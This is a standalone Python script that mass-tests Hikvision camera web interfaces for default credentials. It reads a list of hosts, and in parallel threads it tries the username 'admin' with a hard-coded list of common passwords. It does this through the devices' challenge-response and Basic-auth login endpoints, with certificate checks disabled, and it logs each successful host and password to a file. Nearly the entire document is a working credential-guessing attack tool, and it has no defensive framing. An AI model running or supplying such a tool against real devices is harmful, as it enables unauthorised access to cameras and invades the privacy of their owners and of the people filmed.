import hashlib
import requests
import sys
import re
import xml.etree.ElementTree as ET
from concurrent.futures import ThreadPoolExecutor, as_completed
from base64 import b64encode
import urllib3
import warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
warnings.filterwarnings("ignore", category=UserWarning)
def sha256_encrypt(data):
return hashlib.sha256(data.encode()).hexdigest()
def encrypt_credentials(username, password, challenge, salt=None, iterations=1):
if not challenge:
return None
if salt:
pass_hash = sha256_encrypt(username + salt + password)
pass_hash = sha256_encrypt(pass_hash + challenge)
for _ in range(2, iterations):
pass_hash = sha256_encrypt(pass_hash)
else:
pass_hash = sha256_encrypt(password) + challenge
for _ in range(1, iterations):
pass_hash = sha256_encrypt(pass_hash)
return pass_hash
def parse_response(xml_data):
ns = {'ns': 'http://www.hikvision.com/ver20/XMLSchema'}
root = ET.fromstring(xml_data)
challenge = root.findtext('.//ns:challenge', namespaces=ns)
iterations = root.findtext('.//ns:iterations', namespaces=ns)
salt = root.findtext('.//ns:salt', namespaces=ns)
session_id = root.findtext('.//ns:sessionID', namespaces=ns)
return challenge, int(iterations) if iterations else 1, salt, session_id
def attempt_login(scheme, ip, username, password):
base_url = f"{scheme}://{ip}"
challenge_url = f"{base_url}/ISAPI/Security/sessionLogin/capabilities?username={username}"
session = requests.Session()
session.max_redirects = 3
try:
response = session.get(challenge_url, verify=False, timeout=5, allow_redirects=True)
except requests.exceptions.RequestException:
return None
if response.status_code == 401:
auth = b64encode(f"{username}:{password}".encode()).decode()
headers = {'Authorization': f'Basic {auth}'}
authUrl = f"{base_url}/ISAPI/Security/userCheck"
try:
basic_auth_response = session.get(authUrl, headers=headers, verify=False, timeout=5, allow_redirects=True)
except requests.exceptions.RequestException:
return None
if "<statusValue>200</statusValue>" in basic_auth_response.text and "<statusString>OK</statusString>" in basic_auth_response.text:
return f"Successful login using Basic Auth: {base_url}:{username}:{password}"
try:
challenge, iterations, salt, session_id = parse_response(response.text)
except ET.ParseError:
return None
encrypted_password = encrypt_credentials(username, password, challenge, salt, iterations)
login_data = f"""
<SessionLogin>
<userName>{username}</userName>
<password>{encrypted_password}</password>
<sessionID>{session_id}</sessionID>
</SessionLogin>
"""
login_url = f"{base_url}/ISAPI/Security/sessionLogin"
headers = {'Content-Type': 'application/xml'}
try:
login_response = session.post(login_url, data=login_data, headers=headers, verify=False, timeout=5, allow_redirects=True)
except requests.exceptions.RequestException:
return None
if "<statusValue>200</statusValue>" in login_response.text and "<statusString>OK</statusString>" in login_response.text:
return f"Successful login: {base_url}:{username}:{password}"
def test_connection(scheme, ip):
url = f"{scheme}://{ip}"
try:
response = requests.get(url, verify=False, timeout=5, allow_redirects=True)
return True
except requests.exceptions.RequestException:
return False
def process_passwords(scheme, ip, username, password_list, output_file):
with ThreadPoolExecutor(max_workers=10) as executor:
futures = {executor.submit(attempt_login, scheme, ip, username, password): password for password in password_list}
for future in as_completed(futures):
result = future.result()
if result:
print(result)
with open(output_file, 'a') as f:
f.write(result + '\n')
return
def process_url(url, username, password_list, output_file):
print(f"Checked: {url}")
if not re.match(r"^http[s]?://", url):
ip = url
if test_connection('https', ip):
process_passwords('https', ip, username, password_list, output_file)
elif test_connection('http', ip):
process_passwords('http', ip, username, password_list, output_file)
else:
print(f"Failed to connect to: {ip}")
else:
process_url_with_scheme(url, username, password_list, output_file)
def process_url_with_scheme(url, username, password_list, output_file):
match = re.match(r"(http[s]?)://([^\s/]+)", url)
if match:
scheme, ip = match.groups()
process_passwords(scheme, ip, username, password_list, output_file)
return True
return False
def main(input_file, output_file):
with open(input_file, 'r') as file:
urls = [line.strip() for line in file]
username = "admin"
password_list = [
"admin", "12345", "123456", "12345678", "Password", "P@$$w0rd"
]
with ThreadPoolExecutor(max_workers=100) as executor:
futures = [executor.submit(process_url, url, username, password_list, output_file) for url in urls]
for future in as_completed(futures):
try:
future.result()
except Exception as e:
print(f"Error processing URL: {e}")
if __name__ == "__main__":
if len(sys.argv) != 4 or sys.argv[2] != '-o':
print("Usage: python3 main.py <input_file> -o <output_file>")
sys.exit(1)
input_file = sys.argv[1]
output_file = sys.argv[3]
main(input_file, output_file)